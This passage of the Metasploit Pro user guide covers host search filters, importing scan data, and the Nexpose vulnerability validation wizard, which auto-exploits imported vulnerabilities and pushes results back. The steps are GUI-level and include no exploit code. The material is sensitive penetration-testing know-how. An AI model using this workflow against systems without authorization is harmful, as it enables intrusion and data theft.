Search Filter Name Proto Info IP
Description Refers to the active services that are active on the port, such as DCERPC, HTTP, and SSH. Refers to the protocol that the port runs, such as TCP or UDP. Identifies the operating system and version that the host runs. Refers to the IPaddress of a host.
Vulnerabilities Page
The Vulnerabilities Page shows all vulnerabilities that Metasploit was able to identify for the hosts in a project. To access the Vulnerabilities page, select Analysis >Vulnerabilitiesfrom the Tasks bar. Search Filter Hostname Info Ref IP Name Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the description of the vulnerability. Refers to the vulnerability reference ID. Refers to the IPaddress of a host. Refers to the name of the vulnerability.
Captured Data Page

The Captured Data page lists all data that Metasploit was able to obtain from the hosts in a project. From this page, you can view and download captured data.To access the Captured Data page, select Analysis >Captured Datafrom the Tasks bar. Search Filter Hostname Info IP Type Name
Description Refers to the host name, or nickname,that uniquely identifies the machine. Refers to the description of the vulnerability. Refers to the IPaddress of a host. Refers to the captured data type, such as a shadow file, private or public key, or a process list. Refers to the name of the vulnerability.
Advanced Keyword Search Examples

The following sections provide some examples of searches that you may want to perform.
Advanced Keyword Search Examples
145
Searching for Services Running on a Specific Port

To search for services on port 445, enter the following query in the search field: port:445 .The search returns all services for that port.
Searching for OS Specific Hosts

To search for Linux hosts, enter the following query in the search field: os:linux. The search returns hosts that have been fingerprinted as Linux systems.
Searching for Hosts with Known Vulnerabilities

To search for hosts that have vulnerabilities, enter the following query in the search field: vulns>0. The search returns any host that has at least one vulnerability.
Excluding Hosts from a Search

To exclude the host 10.0.0.2 from a search, enter the following query in the search field: ip!:10.0.0.2. The search displays all hosts except for the one that has been explicitly excluded.
Excluding a Range of Hosts

To exclude any host in the 10.0.0/24 range, enter the following query in the search field: ip!:10.0.0. The search displays all hosts except for the ones that fall into the range specified.
Searching for a Host Tag

To search for all host that have the host tag, NexposeImport, enter the following query in the search field: #NexposeImport. The search returns any host that has been tagged with the NexposeImport host tag.
Nested Searches
Nesting is an advanced search strategy that enables you to build a more complex and precise search query. When you create a nested search query, you use parentheses to group search terms together with search operators and define the order in which they are processed. Each set of keywords that are enclosed in parentheses is processed as a single unit. Since Boolean logic operates on mathematical principles, the search expressions defined within parentheses take precedence over those that are not. If there is more than one set of parentheses, the innermost set of parentheses is processed first, then the next, and so on until the entire query has been interpreted. The search engine supports infinite levels of nesting. Note: The AND operator takes precedence over the OR operator when the search query is parsed.
Nested Searches
146
Nested Search Example

Let's say that you want to search for hosts that are Windows systems and are in the 192.168.1.0 or 192.168.2.0 subnets. If you enter a basic search query, such as os:windows && 192.168.1 || 192.168.2, the search parses the query from left to right. It searches for Windows systems that are in the 192.168.1.0 subnet or any system that is in the 192.168.2.0 subnet. This query does not return the results that you want. To get the results you want, you need to create a nested search query, so that you can group relevant keywords together and define the sequence in which each set of keywords are processed. Using the previous example, you can enter the following nested search query: os:windows && (192.168.1 || 192.168.2). This query first searches for hosts that fall into either of the specified subnets, and then parses those results down to Windows systems.
Multi-Level Nested Search Example

Now let's say that you want to fine -tune your search even further, and you want to find hosts that are Windows systems that are in the 192.168.1.0 or 192.168.2.0 subnets and have Service Pack 1 or 2 installed. In this case, you can use multiple levels of nesting. You can search for (os:windows && ((192.168.1 || 192.168.2) && (sp1 || sp2))). The search looks at the innermost set of parentheses first, which means it has to search for hosts that fall within one of the specified subnets and have Service Pack 1 or 2 installed. If there are hosts that match conditions, the search then parses the resulting list for Windows systems.
Adding a Host Manually

1. From within a project, click the Analysis tab.
2. When the Hosts window appears, click the New Host button.
147
3. Under the Name &Address area, enter a name for the host in the Name field and enter an IP address for the host in the IP address field.
4. If you have an Ethernet address for the host, enter it in the Ethernet address field. 5. Under the Operating System area, you can add the operating system information for the host. For example, if you want to add the operating system for the host, you can enter an OS like Windows XP in the OSName field. This step is completely optional and is only recommended if you have the OSinformation for the host.
6. Select the Lock edited host attributes option if you do not want subsequent imports, discovery scans, or Nexpose scans to modify the host information. By default, this option is enabled. 7. If you want to add a service to the host, click the Add Service link. You will need to define the name, port, protocol, and state for the service.
148
8. When you are done, click the Save button.
Viewing Services for a Host

From within a project, select Analysis > Services from the Tasks menu.
Viewing Host Notes

A host note is a snippet of additional information about a host that Metasploit Pro was able to collect during a Discovery Scan. Typically, host notes contain data that does not fall into one of the categories tracked by the database, such as import and fingerprint information. For example, if the host was imported from a third party source, Metasploit displays this information on the Host Notes tab.
To view a host note:

From within a project, select Analysis > Notes from the Tasks menu.
Deleting a Host
1. From within a project, click the Analysis tab. 2. When the Hosts window appears, select the hosts that you want to delete.
3. Click the Delete button.
4. Click OK to confirm that you want to delete the host.
Viewing Services for a Host
149
Viewing Captured Data

From within a project, select Analysis > Captured Data from the Tasks menu.
Viewing Vulnerabilities
From within a project, select Analysis > Vulnerabilities from the Tasks menu.
Viewing Tags
From within a project, click the Tags tab on the Tasks menu.
Importing Scan Data

Typically, if you use a vulnerability scanner, like Nexpose or Nessus, the scan reports will already include network information about the target systems. Therefore, if you have existing scan data for the target network, you can bypass the discovery scan step and import the scan data instead. When you import the scan data, Metasploit Pro pulls the operating system, services, and vulnerability information from the scan data and stores it in the project for you. Metasploit Pro supports most of the major scanners on the market, including Rapid7's own Nexpose, and other tools like Qualys and Core Impact. For a list of supported scanners, see Supported Scan Data Types. 1. From within a project, click the Overview tab. 2. Click the Import button.
3. When the Import Data page appears, click on the Browse button to open the File Upload window.
Viewing Captured Data
150
4. When the File Upload window appears, browse to the location of the file you want to import. Most import files will either be an XML or ZIP file. When you find the file that you want to upload, select it and click the Open button.
5. If you do not want to import the information for a specific host, you can enter the IPaddress for that host in the Exclude Addresses field. If you need to enter multiple hosts, you need to use a comma to separate each address. 6. If you do not want the import to overwrite data for an existing host, you must select the Donot change existing hosts option. 7. Click the Import Data button.
Viewing Exploits for Known Vulnerabilities

From within a project, select Analysis > Vulnerabilities from the Tasks menu. The Vulnerabilities page appears and shows a list of all vulnerabilities found for each host. Next to each host, you will see the vulnerability name and the corresponding CVE. You can click on the vulnerability name or CVE ID to see the more information about the security flaw.
Viewing Exploits for Known Vulnerabilities
151
Validating Nexpose Vulnerabilities

Chapter 7:
Vulnerability validation is the process of identifying vulnerabilities that pose a real threat to an organization. To learn more about vulnerability validation, read the following topics:
l
Getting Started with Vulnerability Validation on page 153 Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard on page 157 Tracking Real-Time Statistics and Events for Vulnerability Validation on page 180 Nexpose Exceptions on page 187 Validated Vulnerabilities on page 193
Chapter 7: Validating Nexpose Vulnerabilities
152
Getting Started with Vulnerability Validation

Vulnerability scanning plays a key role in the vulnerability management process. It helps you find potential vulnerabilities so that you can quantify and evaluate the threats that can adversely impact a network. While vulnerability scans can give you visibility into a network, they can yield a copious amount of data that require an extensive amount of time and resources to assess and validate. With so many threats facing an organization, it can be difficult to prioritize and remediate security risks. Nexpose and Metasploit Pro seamlessly integrate to streamline the vulnerability validation workflow. It creates a closed-loop security risk assessment solution so that you can find potential vulnerabilities, exploit them, and identify the security flaws that pose a real threat to a network.
Methods for Validating Vulnerabilities

In Metasploit Pro, there are a couple of ways that you can validate vulnerabilities found by Nexpose:
l
VulnerabilityValidationWizard - This method is the easiest and should be used for bulk validations. It provides an all-in-one interface that walks you through importing and exploiting Nexpose vulnerabilities. It also helps you easily identify the vulnerabilities that are exploitable and nonexploitable so that you can send that data back to Nexpose. Manual Validation -This method requires much more legwork and should be used when you have specific vulnerabilities that you want to target. When you perform manual validation,you will need to set up a penetration test as you normally would. This includes creating a project, importing/scanning Nexpose sites, and exploiting specific vulnerabilities. After Metasploit Pro identifies the vulnerabilities that are exploitable and non-exploitable, you will be able to push that data back to Nexpose.
About the Vulnerability ValidationWizard

Metasploit Pro simplifies and streamlines the vulnerability validation process. It provides a guided interface, called the Vulnerability Validation Wizard, that walks you through each step of the vulnerability validation processfrom importing Nexpose data to auto-exploiting vulnerabilities to sending the validation results back to Nexpose. You can even define exceptions for vulnerabilities that were not successfully exploited and generate a report that details the vulnerability testing results directly from Metasploit Pro. When you launch the Vulnerability Validation Wizard, you will need to configure the settings for the following tasks:
l
Creating a project. Scanning or importing Nexpose sites. Tagging Nexpose assets. (optional)
Getting Started with Vulnerability Validation
153
Auto-exploiting vulnerabilities. Generating a report. (optional)
Vulnerability Validation Wizard Workflow
Vulnerability Validation Terminology

Asset
The Nexpose term for a host or target.
AssetGroups
The Nexpose term for a group of hosts or targets.
NexposePush
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.
Site
The Nexpose term for a collection of assets.
Validated Vulnerability
An vulnerability found by Nexpose that Metasploit Pro was able to successfully exploit and obtain a session.
Vulnerability
A security flaw or weakness in an application or system that enables an attacker to compromise the target system.
Vulnerability Validation Terminology
154
Vulnerability Exception
A vulnerability found by Nexpose that Metasploit Pro was unable to exploit.
Vulnerability Exception Reason

The reason why a vulnerability exists and why it should be excluded from the vulnerability assessment.
Vulnerability Result Code

The reason why a module did not run successfully.
Vulnerability Validation
The process of identifying vulnerabilities that are exploitable.
Before YouBegin
Before you can run the Vulnerability Validation Wizard, you will need to make sure that you have access to a Nexpose instance.You can only validate vulnerabilities withMetasploit Pro if you have Nexpose Enterprise or Nexpose Consultant version 5.7.16 or higher. Please check your Nexpose edition before attempting to use the VulnerabilityValidationWizard.
Adding a Nexpose Console

You can configure a Nexpose console directly from the Vulnerability Validation Wizard. However, to simplify the vulnerability validation workflow, it is recommended that you globally add the Nexpose Consoles you intend to use prior to launching the wizard.When you globally add a Nexpose Console, it will be accessible to all projects and all users.
To configure a Nexpose Console:

1. Select Administration > Global Settings from the Administration menu.
2. Find the Nexpose Consoles area.
Before YouBegin
155
3. Click the Configure a Nexpose Console button.
4. When the Configure a Nexpose Console page appears, enter the following information:
l
Console Address - The IP address to the server that runs Nexpose. You can also specify the server name. Console Port - The port that runs the Nexpose service. The default port is 3780. Console Username - The Nexpose user name that will be used to log in to the console. Console Password - The Nexpose password that will be used to authenticate the user account.
5. Save the Nexpose Console.
Before YouBegin
156
Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard

The Vulnerability Validation Wizard provides a guided interface that walks you through pulling Nexpose vulnerabilities data into a project and exploiting them. There are a couple of ways that you can bring Nexpose vulnerability data into a project through the VulnerabilityValidationWizard:
l
Importing Existing Sites - You can choose multiple sites from which you want to import hosts. Metasploit Pro pulls all of the hosts and their associated vulnerability information from the selected sites and stores their information in a project. Metasploit Pro only imports vulnerabilities for which it has matching exploit modules. For more information on how to import and exploit vulnerabilities with the Vulnerability Validation Wizard, see Importing and Exploiting Imported Nexpose Data on page 157. Running a Nexpose Scan - You can specify the hosts that you want to scan for vulnerabilities. Metasploit Pro creates a new site on Nexpose and adds the hosts to them. Nexpose scans the hosts for vulnerabilities. After the Nexpose scan completes, Metasploit Pro imports the vulnerabilities for which it has matching exploit modules. For more information on how to scan for vulnerabilities and exploit them with the Vulnerability Validation Wizard, see Scanning Nexpose Sites and Exploiting Identified Vulnerabilities on page 168.
Importing and Exploiting Imported Nexpose Data

1. Log in to the Metasploit Pro web interface. 2. When the Projects page appears, find the Quick Start Wizards and click on the Validate Vulnerabilities widget. The Validate Vulnerabilities Wizard opens and displays the Create Project page.
Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard
157
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
158
5. Verify that the Import existing Nexpose vulnerability data option is selected.
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console from which you want to import sites. After you select a console, the wizard displays the list of sites that you can import. Note: Metasploit Pro will import all the assets from a site unless you explicitly define the assets that you want to exclude. To exclude assets from the import, click the Excluded Addresses dropdown and enter the addresses of those assets in the Excluded Addresses field.
7. From the sites list, select the sites that you want to import into the project. You can use the select all checkbox to choose all of the listed sites, or you can select the sites individually. Note: Metasploit Pro imports all assets from the site. For each asset, Metasploit Pro pulls and displays the IP address, operating system, MAC address, OS flavor, vulnerability name, and vulnerability references.
159
8. After you select the sites you want to import, click on the Tag tab and select the Tag option. Note: Tags are a useful tool if you want to easily create Nexpose asset groups in Metasploit Pro. If you do not want to tag assets, go to Step 10.
9. Select the Automatically tag by OS option if you want to tag each host with its operating system. Note: If this option is enabled, Windows hosts will be tagged with os_windows, and Linux hosts will be tagged with os_linux.
160
10. Select the Usecustom tagoption if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to define a custom tag.
161
11. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
12. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should choose Great or Excellent.
162
13. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the GenerateReport option and skip to the last step.
14. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
163
15. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
164
16. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report. 17. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
165
18. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
19. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.
166
20. Click the Launch button. The Findings window appears and shows the statistics for the test.
Matching Metasploit Exploits to Nexpose Vulnerabilities

Metasploit Pro only matches vulnerabilities from Nexpose for which it has remote exploit modules. However, since Nexpose includes all local exploits, auxiliary modules, and browser exploits when it matches vulnerabilities to modules, this number may not match the number of vulnerabilities imported from Nexpose. This is important to remember when you are looking at the Findings window. You will see a different number of vulnerabilities imported than number of exploit matches.
167
Scanning Nexpose Sites and Exploiting Identified Vulnerabilities

1. Log in to the Metasploit Pro web interface. 2. When the Projects page appears, find the Quick Start Wizards and click on the Validate Vulnerabilities widget. The Validate Vulnerabilities Wizard opens and displays the Create Project page.
168
3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.
4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.
5. Select the Start a Nexpose Scan to get data option.
169
6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console that you want to use to scan for vulnerabilities. The scan configuration page appears.
170
7. Enter the host addresses, or assets, that you want to scan in the Scan targets field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
8. Click the Scan template dropdown and select the template you want to use. Note: A scan template is a predefined set of scan options. There are a few default ones that you can choose from. For more information on each scan template, please see the NexposeUser's Guide.
171
9. Click the Tag tab. Note: If you do not want to tag assets, go to Step 13.
10. Select the Automatically tag by OS option if you want to tag each host with its operating system.
172
Note: If enabled, hosts will be tagged with os_linux or os_windows.
11. Select the Usecustom tagoption if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to create a custom tag.
173
12. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.
13. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should use Great or Excellent.
174
14. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the GenerateReport option and skip to the last step.
15. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.
175
16. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.
176
17. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report. 18. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.
177
19. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or a standard CIDRnotation.
178
21. Click the Launch button. The Findings window appears and shows the statistics for the test.
179
Tracking Real-Time Statistics and Events for Vulnerability Validation

The Findings window displays the real-time statistics for the test and the task log. You can click on the tabs at the top of the Findings window to switch between the real-time statistics and the task log. From the Findings window, you can also automatically push validated vulnerabilities and access the Vulnerabilities Exceptions configuration page.
Accessing the Findings Window

The Findings window automatically appears when you start the Vulnerability Validation Wizard. If you navigate away from the Findings window, you can go to the Tasks page to access it again.
To access the Findings Window:

1. From within a project, select Tasks > Show Tasks from the Project Tab bar. The Tasks page appears.
2. Find the Vulnerability Validation task.
Tracking Real-Time Statistics and Events for Vulnerability Validation
180
3. Click the Vulnerability Validation task name. The Findings window appears.
The Statistics Tab

The Statistics tab shows a high-level, count of hosts, vulnerabilities, and exploits. Each value is displayed in a stat bubble with an orange progress bar. The progress bar wraps around the stat bubble and only displays when there is activity occurring for a particular finding.
From the Statistics tab, you can track the following data:
l
The total number of hosts that have been scanned or imported. The total number of unique vulnerabilities that have been identified. The total number of exploit modules that match Nexpose vulnerabilities.
The Statistics Tab
181
The total number of vulnerabilities that Metasploit Pro was able to exploit. The total number of vulnerabilities that Metasploit Pro was unable to exploit.
Viewing a List of Imported Hosts from the Findings Window

1. Open the Findings window. 2. Click on the Hosts Imported tab. The Hosts list appears and displays the IP addresses for each host that has been imported from a Nexpose site.
The Statistics Tab
182
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of hosts displayed.
Viewing a List of Imported Vulnerabilities from the Findings Window

1. Open the Findings Window. 2. Click the Vulns Found tab. A list of imported vulnerabilities appears.
The Statistics Tab
183
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of vulnerabilities displayed.
Viewing a List of Exploit Matches from the Findings Window

1. Open the Findings Window. 2. Click the Exploit Matches tab. A list of imported vulnerabilities appears.
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exploit modules displayed.
The Statistics Tab
184
Viewing a List of Validated Vulnerabilities from theFindings Window

1. Open the Findings Window. 2. Click the Vulns validations tab. A list of imported vulnerabilities appears.
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability validations, the state will be exploited. 3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of validations displayed.
Viewing a List of Vulnerability Exceptions from the Findings Window

1. Open the Findings Window. 2. Click the Vulns exceptions tab. A list of vulnerability exceptions appears.
You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability exceptions, the state will be failed.
The Statistics Tab
185
3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of exceptions displayed.
The Tasks Log Tab

The Tasks Log tab shows a detailed activity log for the Vulnerability Validation Wizard. Each task that Metasploit Pro performs is documented in the Tasks Log. For example, you can view the assets and vulnerability definitions as they are being imported into a project or you can view the exploit modules as they are being run. If you have chosen to perform a dry run of the auto-exploitation task, you can go to the Tasks Log to view the proposed attack plan. Additionally, the Tasks log shows you the current state of the test, the start time of the test, and the amount of time that the test has been running.
The Tasks Log Tab
186
Nexpose Exceptions
An exception defines the reason why a vulnerability exists. You apply exceptions to vulnerabilities that are typically low-risk or are used deliberately to mitigate bigger threats. Vulnerability exceptions help you exclude certain vulnerabilities from a report so that you can manage your risk score. You can apply exceptions to vulnerabilities that MetasploitPro was unable to exploit. These vulnerabilities have a status of Not Exploitable, which indicates that Metasploit Pro was unable to obtain a session on the target host due to some compensating control or back porting. Exceptions can be defined for vulnerabilities for the following reasons:
l
They are used as compensating controls or to mitigate additional risks. They represent an acceptable use case or deliberate practice, such as anonymous FTP access. They represent an acceptable risk and may require more resources than you are willing to invest to remediate.These vulnerabilities typically pose a minimal risk. They are false positives.
The Exceptions Page

You create and push Nexpose exceptions from the Exceptions page. The Exceptions page is accessible from the Findings window or from the Vulnerabilities page. From the Exceptions page, you can define the exception settings for a group of hosts that have a specific vulnerability or you can define them individually for each host.
From the Exceptions page, you can perform the following tasks:
Nexpose Exceptions
187
View all the vulnerabilities that Metasploit Pro was unable to exploit. Assign the exception reason for each vulnerability. Assign expiration dates for vulnerability exceptions. Add comments to the vulnerability exception. Automatically approve vulnerability exception requests. Push exceptions back to Nexpose.
Accessing the Exceptions Page

1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears. 2. Click the Create Exception dropdown and select All Not Exploited. The Exceptions page appears. Note: The All Not Exploited option selects all vulnerabilities that have an Not Exploited status and displays them on the Exceptions page. If you only want to create exceptions for a few specific vulnerabilities, you can manually select them from the Vulnerabilities list and choose the All Selected option instead.
Creating and Pushing Nexpose Exceptions

1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears. 2. Click the Create Exception dropdown and select All Not Exploited. The Exceptions page appears. Note: The Create Exceptions button is available on the Findings window when there are vulnerabilities ready for you to create exceptions for; otherwise, it will be grayed out.
188
3. Click the Nexpose Console dropdown and select the console you want to push the exceptions to.
4. For each vulnerability, click the Reason dropdown and choose the vulnerability exception reason you want to assign to it. You can also provide additional information for the exception in the Comment field. For more information on exception reasons, see Vulnerability Exception Reasons on page 191. Note: If you want to define bulk exception settings for all hosts in a vulnerability group, select the All Hosts with this Vulnerability option. The Reason and Comment fields become available under to the vulnerability name.The reason you select applies to all hosts in that vulnerability group.
189
5. Choose the All Expire option if you want to set an expiration date for the vulnerability exceptions. If you do not want to set an expiration date for any vulnerability exceptions, keep the default Never Expire option selected and go to Step 6.
6. To set the same expiration date for all vulnerability exceptions, select on the All Expire option. A calendar appears. Find and select the date that you want to use. If you want to set a unique expiration date for each host, skip this step and go to the next step.
7. To set a unique expiration date for each host: a. Select the All Expire option.
b. Click on the Expire field next to each host to display the calendar.
c. Find the expiration date that you want to use and select it. 8. Deselect the Automatically Approve option if you do not want to approve any of the vulnerability exception requests from Metasploit Pro. Instead, you will manually approve the exception requests through the Nexpose Console.
190
9. Select the hosts that you want to push exceptions for. Use the Select All Hosts checkbox if you want to push exceptions for all hosts. 10. When you are ready to push the exceptions, click the Push Exceptions button.
Vulnerability Exception Reasons

The following vulnerability exception reasons are available:
l
False positive - Use this exception reason for a vulnerability that does not exist. Compensating control - Use this exception reason to indicate that a vulnerability is a compensating control, or a workaround for a security requirement. Acceptable use - Use this exception reason for any vulnerability that is used as part of organizational practices. Acceptable risk - Use this exception reason for any vulnerability that are considered low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth. Other - Use this exception reason to define a custom exception. If you select Other, you can provide a custom exception reason in the Comment field.
Module Result Codes

A result code identifies the reason an exploit failed. You can view the result code for a vulnerability on the Vulnerability Exceptions page. The following result codes are available: None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.
191
Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed. Unreachable - Indicates that Metasploit Pro could not reach the network service. Bad-config - Indicates that the exploit settings were configured incorrectly. Disconnected - Indicates that the network service disconnected during a module run. Not-found - Indicates that Metasploit Pro could not find the application or service. Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application. Timeout-expired - Indicates that a timeout occurred. User-interrupt - Indicates that the user stopped the module run. No-access - Indicates that Metasploit Pro could not access the application. No-target - Indicates that the module configuration was not compatible with the target. Not-vulnerable - Indicates that the application was not vulnerable. Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.
Viewing Vulnerability Exceptions in Nexpose

After you push the exceptions, you can go to the Vulnerability Exception Listing (Administration > Exceptions and Overrides > Manage) in the Nexpose Console to view the exception requests that have been approved or are awaiting review. The Vulnerability Exception Listing shows the exceptions that are active across all sites. For more information on how to manage vulnerability exceptions, please see the Nexpose User's Guide.
Viewing Vulnerability Exceptions in Nexpose
192
Validated Vulnerabilities
A validated vulnerability is a vulnerability that Metasploit Pro was able to successfully exploit to obtain a session on a target host. Typically, the ability to gain a session on a host target provides enough evidence to show that a vulnerability poses a real security risk. However, you can use the session to collect additional evidence, such as screenshots, system files, and password files. If MetasploitPro is able to successfully exploit a vulnerability, the exploit status for the host will be Exploited. All vulnerabilities with a status of Exploited can be sent back to Nexpose as a validated vulnerability.
Pushing Validated Vulnerabilities Back to Nexpose

Sending validated vulnerabilities back to Nexpose is a simple one-button process. The Push Validations button is located on the Findings Window and the Vulnerabilities Page. You can use the button at either locations to send validations back to a Nexpose console. You only need to perform the push once after a wizard run.
To push validated vulnerabilities back to Nexpose:

1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears. 2. Find the Push Exploited Vulnerabilities button. This button will be available if there are validations that need to be sent to Nexpose.
Validated Vulnerabilities
193
3. Click the Push Exploited Vulnerabilities button. The Task Log appears and shows you when the push is complete.
Viewing Validated Vulnerabilities in Nexpose

You can identify the vulnerabilities that have been validated by Metasploit from the individual asset page. Nexpose displays a Validated with Metasploit icon next to a validated vulnerability. This icon indicates that the vulnerability has been successfully exploited and requires remediation.
To view a list of validated vulnerabilities in the Nexpose Console:

1. From your Nexpose console, click the Assets tab. 2. Click the View assets by the sites they belong to link.
3. Scroll down to the Site Listing and find the site that you imported and tested in Metasploit Pro.
4. Open the site. The site page appears.
194
5. Scroll down to the Asset Listing and find the asset that has the validated vulnerability.
6. Click on the asset name. The asset page appears. 7. Find the Vulnerability Listing.
8. Click on the Exploited column to sort by validated vulnerabilities. Validated vulnerabilities will appear at the top of the column.
195
Searching for Validated Vulnerabilities in Nexpose

1. From the home page in your Nexpose Console, scroll down to the Asset Group Listing. 2. Click the New Dynamic Asset Group button. The Filtered Asset Search page appears.
3. Use the filters to create the following query: validated vulnerabilities are present.
4. Click the Search button. The search returns a list of assets that have validated vulnerabilities.
Searching for Validated Vulnerabilities in Nexpose
196
Chapter 8:
Nexpose
To learn more about Nexpose, read the following topics:

l
About Nexpose on page 198 Nexpose Scan on page 200 Import Nexpose Data on page 204 Nexpose Asset Groups on page 212
About Nexpose
Vulnerability analysis is the process that detects, identifies, and assesses the vulnerabilities that exist within an organizational infrastructure. A vulnerability is a characteristic of an asset that an attacker can exploit to gain unauthorized access to sensitive data, inject malicious code, or generate a denial of service attack. To prevent security breaches, it is important to identify and remediate security holes and vulnerabilities that can expose an asset to an attack. Generally, to perform vulnerability analysis, you perform the following steps: 1. Define and classify network or system resources. 2. Identify potential threats for each resource. 3. Prioritize the risks. 4. Develop a plan to remediate the vulnerabilities. Nexpose automates the steps that you typically use to find and analyze vulnerabilities. Nexpose scans the assets to identify the active services, open ports, and applications that run on each machine. After the scan, Nexpose attempts to identify vulnerabilities that may exist based on the attributes of the known services and applications. Nexpose discloses the results in a scan report, which help you to prioritize vulnerabilities based on risk factor and determine the most effective solution to implement.
Nexpose Terminology
The following are common Nexpose terms:
Site
A site is a logical group of assets that has a dedicated scan engine. A site is similar to a project, However, projects are more for intermittent spot tests, whereas sites can run over a long period of time and provide you with historical, trending data.
Asset
An asset is a host or target that Nexpose scans for vulnerabilities.
Asset Group
An asset group is a collection of assets. An asset group does not have a dedicated scan engine. Instead,
Scan Template
A scan template defines audit level that Nexpose uses to perform a vulnerability scan.
About Nexpose
198
Nexpose Integration with Metasploit

Nexpose integrates with Metasploit Pro to provide a complete vulnerability assessment and verification tool that helps you eliminate false positives, verify vulnerabilities, and validate remediation measures. There are couple of ways that you can bring Nexpose data into Metasploit Pro. You can run a Nexpose scan directly from the Metasploit user interface or you can import Nexpose scan data into Metasploit Pro. When you import data from Nexpose into Metasploit Pro, Metasploit Pro automatically indexes the vulnerability data from Nexpose and uses the service and vulnerability reference ID to map each vulnerability to a matching exploit. The mapped exploits helps you to easily launch attacks against the vulnerability and to quickly determine if the vulnerability is a real risk or a false positive. In addition to vulnerability scanning, Metasploit Pro provides a vulnerability exception management interface and the ability to create a Nexpose asset group.
Nexpose Integration with Metasploit
199
Nexpose Scan
You can use the Community and Enterprise editions of Nexpose to scan assets for known vulnerabilities. After you run a Nexpose scan, you can import the scan data into Metasploit Pro to validate the results of the vulnerability scan. Metasploit Pro provides a connector that allows you to run a Nexpose scan and automatically import the scan results into a project. Before you can run a Nexpose scan, you must configure a Nexpose Console for the Metasploit Pro to use. Metasploit Pro only supports the number of hosts that you have licenses for in Nexpose. If you provide more hosts than the number of licenses that you have available, the scan fails. For example, if you have a Community license, the most number of hosts Nexpose supports is 32. If you provide 35 hosts, the scan fails. You can download the Community edition of Nexpose from http://www.rapid7.com/vulnerabilityscanner.jsp. For more information on how to install and configure Nexpose, visit http://community.rapid7.com.
Before You Run a Nexpose Scan

Before you can run a Nexpose scan, you must configure a Nexpose Console for Metasploit Pro to use. Connections to the Nexpose Console act as a persistent connections that you can use to import assets into a project. After you set up a Nexpose Console, you can access the console from any project to perform a Nexpose scan. Nexpose consoles are global components and are available to all projects.
Configuring a Nexpose Console

1. Choose Administration > Global Settings from the main menu.
2. Scroll down to the Nexpose Consoles area.
Nexpose Scan
200
3. Click Configure a Nexpose Console.
4. In the Console Name field, enter a name for the console.
5. Enter the console address. For example, if Nexpose runs on the local system, you can use 127.0.0.1.
6. Enter the console port. By default, Nexpose runs on port 3780.
201
7. Enter the user name that you use to log in to the Nexpose Console.
8. Enter the password that you use to log in to the Nexpose Console.
202
9. Select the Enabled option to initialize and activate the Nexpose Console. 10. Save the configuration.
203
Import Nexpose Data

Metasploit Pro supports the import of Nexpose simple XML and Nexpose raw XML files. When Metasploit Pro import data from a Nexpose report, it brings in the information that Nexpose found for each asset and displays it on the Hosts page. Metasploit Pro imports the following asset information:
l
IP address Host name Operating system Services Known vulnerabilities
Importing Vulnerability Data from Nexpose

2. When the Host window appears, click the Import button.
